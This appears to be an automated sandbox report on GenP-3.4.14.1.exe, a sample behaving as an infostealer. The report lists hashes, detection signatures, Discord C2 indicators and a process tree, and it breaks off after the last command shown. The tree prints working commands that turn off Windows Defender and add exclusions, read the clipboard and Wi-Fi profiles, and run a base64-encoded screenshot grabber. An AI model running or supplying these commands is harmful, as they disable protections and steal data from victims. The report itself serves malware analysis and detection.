Analysis
-
max time kernel
51s -
max time network
54s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 17:42
Behavioral task
behavioral1
Sample
GenP-3.4.14.1.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
GenP-3.4.14.1.exe
Resource
win10v2004-20241007-en
General
-
Target
GenP-3.4.14.1.exe
-
Size
8.1MB
-
MD5
18286deb642a79bd9af012a30dc872c7
-
SHA1
8cd8afa5d4da303d1b1be482dc077e0f9cbc7a45
-
SHA256
a5ce5fc1a69793f317e433cdc75ddc86ff19597e0355be3e82114fceabfec2e6
-
SHA512
4240a7bc05d96de14169808313b44a43b3965cf9a408d1c391a045f8537ecd0aeb1a56ccbd02799a31c52539f10e8414f0af3e69695e8d7913b3e3a378987d7e
-
SSDEEP
196608:BB0cD9a1Ljv+bhqNVoBKUh8mz4Iv9PQv1DVa:8i9CL+9qz8/b4Imv3a
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1400 powershell.exe 2596 powershell.exe 3136 powershell.exe 2148 powershell.exe 2852 powershell.exe 232 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4952 cmd.exe 3948 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2644 bound.exe 3956 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe 2396 GenP-3.4.14.1.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 discord.com 28 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023bc8-89.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 4440 tasklist.exe 1596 tasklist.exe 4500 tasklist.exe -
resource yara_rule behavioral2/files/0x000e000000023bae-22.dat upx behavioral2/memory/2396-26-0x00007FFE1BBD0000-0x00007FFE1C1B9000-memory.dmp upx behavioral2/files/0x000a000000023b93-29.dat upx behavioral2/memory/2396-31-0x00007FFE20820000-0x00007FFE20843000-memory.dmp upx behavioral2/files/0x000b000000023b9f-32.dat upx behavioral2/files/0x0009000000023bbe-40.dat upx behavioral2/memory/2396-50-0x00007FFE25850000-0x00007FFE2585F000-memory.dmp upx behavioral2/files/0x000a000000023b9a-49.dat upx behavioral2/files/0x000a000000023b99-48.dat upx behavioral2/files/0x000a000000023b98-47.dat upx behavioral2/files/0x000a000000023b97-46.dat upx behavioral2/files/0x000a000000023b96-45.dat upx behavioral2/files/0x000a000000023b95-44.dat upx behavioral2/files/0x000a000000023b94-43.dat upx behavioral2/files/0x000a000000023b92-42.dat upx behavioral2/files/0x000e000000023bc2-41.dat upx behavioral2/files/0x0009000000023bbd-39.dat upx behavioral2/files/0x000a000000023ba7-36.dat upx behavioral2/files/0x000b000000023b9e-35.dat upx behavioral2/memory/2396-56-0x00007FFE1C900000-0x00007FFE1C92D000-memory.dmp upx behavioral2/memory/2396-58-0x00007FFE22130000-0x00007FFE22149000-memory.dmp upx behavioral2/memory/2396-60-0x00007FFE1C6E0000-0x00007FFE1C703000-memory.dmp upx behavioral2/memory/2396-62-0x00007FFE1C340000-0x00007FFE1C4B7000-memory.dmp upx behavioral2/memory/2396-64-0x00007FFE1C7B0000-0x00007FFE1C7C9000-memory.dmp upx behavioral2/memory/2396-66-0x00007FFE1C7A0000-0x00007FFE1C7AD000-memory.dmp upx behavioral2/memory/2396-68-0x00007FFE1C710000-0x00007FFE1C743000-memory.dmp upx behavioral2/memory/2396-72-0x00007FFE1BBD0000-0x00007FFE1C1B9000-memory.dmp upx behavioral2/memory/2396-73-0x00007FFE0CEE0000-0x00007FFE0CFAD000-memory.dmp upx behavioral2/memory/2396-76-0x00007FFE20820000-0x00007FFE20843000-memory.dmp upx behavioral2/memory/2396-75-0x00007FFE0C9B0000-0x00007FFE0CED2000-memory.dmp upx behavioral2/memory/2396-78-0x00007FFE1C320000-0x00007FFE1C334000-memory.dmp upx behavioral2/memory/2396-81-0x00007FFE1C6D0000-0x00007FFE1C6DD000-memory.dmp upx behavioral2/memory/2396-80-0x00007FFE1C900000-0x00007FFE1C92D000-memory.dmp upx behavioral2/memory/2396-87-0x00007FFE0C2D0000-0x00007FFE0C3EC000-memory.dmp upx behavioral2/memory/2396-86-0x00007FFE22130000-0x00007FFE22149000-memory.dmp upx behavioral2/memory/2396-103-0x00007FFE1C6E0000-0x00007FFE1C703000-memory.dmp upx behavioral2/memory/2396-199-0x00007FFE1C340000-0x00007FFE1C4B7000-memory.dmp upx behavioral2/memory/2396-207-0x00007FFE1C7B0000-0x00007FFE1C7C9000-memory.dmp upx behavioral2/memory/2396-291-0x00007FFE1C710000-0x00007FFE1C743000-memory.dmp upx behavioral2/memory/2396-301-0x00007FFE0CEE0000-0x00007FFE0CFAD000-memory.dmp upx behavioral2/memory/2396-307-0x00007FFE0C9B0000-0x00007FFE0CED2000-memory.dmp upx behavioral2/memory/2396-314-0x00007FFE1C340000-0x00007FFE1C4B7000-memory.dmp upx behavioral2/memory/2396-309-0x00007FFE20820000-0x00007FFE20843000-memory.dmp upx behavioral2/memory/2396-308-0x00007FFE1BBD0000-0x00007FFE1C1B9000-memory.dmp upx behavioral2/memory/2396-322-0x00007FFE0C2D0000-0x00007FFE0C3EC000-memory.dmp upx behavioral2/memory/2396-343-0x00007FFE1BBD0000-0x00007FFE1C1B9000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1016 cmd.exe 1156 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2688 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2792 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2852 powershell.exe 2852 powershell.exe 1400 powershell.exe 1400 powershell.exe 3136 powershell.exe 3136 powershell.exe 2596 powershell.exe 2596 powershell.exe 3948 powershell.exe 3948 powershell.exe 3136 powershell.exe 3136 powershell.exe 1400 powershell.exe 1400 powershell.exe 936 powershell.exe 936 powershell.exe 2852 powershell.exe 2852 powershell.exe 2596 powershell.exe 2596 powershell.exe 3948 powershell.exe 936 powershell.exe 232 powershell.exe 232 powershell.exe 3808 powershell.exe 3808 powershell.exe 2148 powershell.exe 2148 powershell.exe 2188 powershell.exe 2188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2852 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 4440 tasklist.exe Token: SeDebugPrivilege 1596 tasklist.exe Token: SeIncreaseQuotaPrivilege 1672 WMIC.exe Token: SeSecurityPrivilege 1672 WMIC.exe Token: SeTakeOwnershipPrivilege 1672 WMIC.exe Token: SeLoadDriverPrivilege 1672 WMIC.exe Token: SeSystemProfilePrivilege 1672 WMIC.exe Token: SeSystemtimePrivilege 1672 WMIC.exe Token: SeProfSingleProcessPrivilege 1672 WMIC.exe Token: SeIncBasePriorityPrivilege 1672 WMIC.exe Token: SeCreatePagefilePrivilege 1672 WMIC.exe Token: SeBackupPrivilege 1672 WMIC.exe Token: SeRestorePrivilege 1672 WMIC.exe Token: SeShutdownPrivilege 1672 WMIC.exe Token: SeDebugPrivilege 1672 WMIC.exe Token: SeSystemEnvironmentPrivilege 1672 WMIC.exe Token: SeRemoteShutdownPrivilege 1672 WMIC.exe Token: SeUndockPrivilege 1672 WMIC.exe Token: SeManageVolumePrivilege 1672 WMIC.exe Token: 33 1672 WMIC.exe Token: 34 1672 WMIC.exe Token: 35 1672 WMIC.exe Token: 36 1672 WMIC.exe Token: SeDebugPrivilege 4500 tasklist.exe Token: SeDebugPrivilege 3948 powershell.exe Token: SeIncreaseQuotaPrivilege 1672 WMIC.exe Token: SeSecurityPrivilege 1672 WMIC.exe Token: SeTakeOwnershipPrivilege 1672 WMIC.exe Token: SeLoadDriverPrivilege 1672 WMIC.exe Token: SeSystemProfilePrivilege 1672 WMIC.exe Token: SeSystemtimePrivilege 1672 WMIC.exe Token: SeProfSingleProcessPrivilege 1672 WMIC.exe Token: SeIncBasePriorityPrivilege 1672 WMIC.exe Token: SeCreatePagefilePrivilege 1672 WMIC.exe Token: SeBackupPrivilege 1672 WMIC.exe Token: SeRestorePrivilege 1672 WMIC.exe Token: SeShutdownPrivilege 1672 WMIC.exe Token: SeDebugPrivilege 1672 WMIC.exe Token: SeSystemEnvironmentPrivilege 1672 WMIC.exe Token: SeRemoteShutdownPrivilege 1672 WMIC.exe Token: SeUndockPrivilege 1672 WMIC.exe Token: SeManageVolumePrivilege 1672 WMIC.exe Token: 33 1672 WMIC.exe Token: 34 1672 WMIC.exe Token: 35 1672 WMIC.exe Token: 36 1672 WMIC.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeIncreaseQuotaPrivilege 4144 WMIC.exe Token: SeSecurityPrivilege 4144 WMIC.exe Token: SeTakeOwnershipPrivilege 4144 WMIC.exe Token: SeLoadDriverPrivilege 4144 WMIC.exe Token: SeSystemProfilePrivilege 4144 WMIC.exe Token: SeSystemtimePrivilege 4144 WMIC.exe Token: SeProfSingleProcessPrivilege 4144 WMIC.exe Token: SeIncBasePriorityPrivilege 4144 WMIC.exe Token: SeCreatePagefilePrivilege 4144 WMIC.exe Token: SeBackupPrivilege 4144 WMIC.exe Token: SeRestorePrivilege 4144 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3532 wrote to memory of 2396 3532 GenP-3.4.14.1.exe 84 PID 3532 wrote to memory of 2396 3532 GenP-3.4.14.1.exe 84 PID 2396 wrote to memory of 376 2396 GenP-3.4.14.1.exe 86 PID 2396 wrote to memory of 376 2396 GenP-3.4.14.1.exe 86 PID 2396 wrote to memory of 3360 2396 GenP-3.4.14.1.exe 87 PID 2396 wrote to memory of 3360 2396 GenP-3.4.14.1.exe 87 PID 2396 wrote to memory of 4236 2396 GenP-3.4.14.1.exe 90 PID 2396 wrote to memory of 4236 2396 GenP-3.4.14.1.exe 90 PID 2396 wrote to memory of 2876 2396 GenP-3.4.14.1.exe 91 PID 2396 wrote to memory of 2876 2396 GenP-3.4.14.1.exe 91 PID 2396 wrote to memory of 3864 2396 GenP-3.4.14.1.exe 92 PID 2396 wrote to memory of 3864 2396 GenP-3.4.14.1.exe 92 PID 2396 wrote to memory of 4072 2396 GenP-3.4.14.1.exe 97 PID 2396 wrote to memory of 4072 2396 GenP-3.4.14.1.exe 97 PID 2396 wrote to memory of 1208 2396 GenP-3.4.14.1.exe 96 PID 2396 wrote to memory of 1208 2396 GenP-3.4.14.1.exe 96 PID 3360 wrote to memory of 2852 3360 cmd.exe 100 PID 3360 wrote to memory of 2852 3360 cmd.exe 100 PID 376 wrote to memory of 2596 376 cmd.exe 101 PID 376 wrote to memory of 2596 376 cmd.exe 101 PID 4236 wrote to memory of 1400 4236 cmd.exe 102 PID 4236 wrote to memory of 1400 4236 cmd.exe 102 PID 2876 wrote to memory of 2644 2876 cmd.exe 103 PID 2876 wrote to memory of 2644 2876 cmd.exe 103 PID 3864 wrote to memory of 3136 3864 cmd.exe 104 PID 3864 wrote to memory of 3136 3864 cmd.exe 104 PID 2396 wrote to memory of 1636 2396 GenP-3.4.14.1.exe 105 PID 2396 wrote to memory of 1636 2396 GenP-3.4.14.1.exe 105 PID 2396 wrote to memory of 4952 2396 GenP-3.4.14.1.exe 106 PID 2396 wrote to memory of 4952 2396 GenP-3.4.14.1.exe 106 PID 2396 wrote to memory of 3304 2396 GenP-3.4.14.1.exe 108 PID 2396 wrote to memory of 3304 2396 GenP-3.4.14.1.exe 108 PID 1208 wrote to memory of 4440 1208 cmd.exe 110 PID 1208 wrote to memory of 4440 1208 cmd.exe 110 PID 2396 wrote to memory of 2872 2396 GenP-3.4.14.1.exe 111 PID 2396 wrote to memory of 2872 2396 GenP-3.4.14.1.exe 111 PID 4072 wrote to memory of 1596 4072 cmd.exe 113 PID 4072 wrote to memory of 1596 4072 cmd.exe 113 PID 2396 wrote to memory of 1016 2396 GenP-3.4.14.1.exe 114 PID 2396 wrote to memory of 1016 2396 GenP-3.4.14.1.exe 114 PID 2396 wrote to memory of 2912 2396 GenP-3.4.14.1.exe 117 PID 2396 wrote to memory of 2912 2396 GenP-3.4.14.1.exe 117 PID 2396 wrote to memory of 4260 2396 GenP-3.4.14.1.exe 119 PID 2396 wrote to memory of 4260 2396 GenP-3.4.14.1.exe 119 PID 2872 wrote to memory of 4156 2872 cmd.exe 136 PID 2872 wrote to memory of 4156 2872 cmd.exe 136 PID 1636 wrote to memory of 1672 1636 cmd.exe 122 PID 1636 wrote to memory of 1672 1636 cmd.exe 122 PID 1016 wrote to memory of 1156 1016 cmd.exe 123 PID 1016 wrote to memory of 1156 1016 cmd.exe 123 PID 3304 wrote to memory of 4500 3304 cmd.exe 124 PID 3304 wrote to memory of 4500 3304 cmd.exe 124 PID 4952 wrote to memory of 3948 4952 cmd.exe 125 PID 4952 wrote to memory of 3948 4952 cmd.exe 125 PID 2912 wrote to memory of 2792 2912 cmd.exe 126 PID 2912 wrote to memory of 2792 2912 cmd.exe 126 PID 4260 wrote to memory of 936 4260 cmd.exe 128 PID 4260 wrote to memory of 936 4260 cmd.exe 128 PID 2396 wrote to memory of 2964 2396 GenP-3.4.14.1.exe 129 PID 2396 wrote to memory of 2964 2396 GenP-3.4.14.1.exe 129 PID 2964 wrote to memory of 4696 2964 cmd.exe 131 PID 2964 wrote to memory of 4696 2964 cmd.exe 131 PID 2396 wrote to memory of 4372 2396 GenP-3.4.14.1.exe 132 PID 2396 wrote to memory of 4372 2396 GenP-3.4.14.1.exe 132
Processes
-
C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\GenP-3.4.14.1.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4260 -
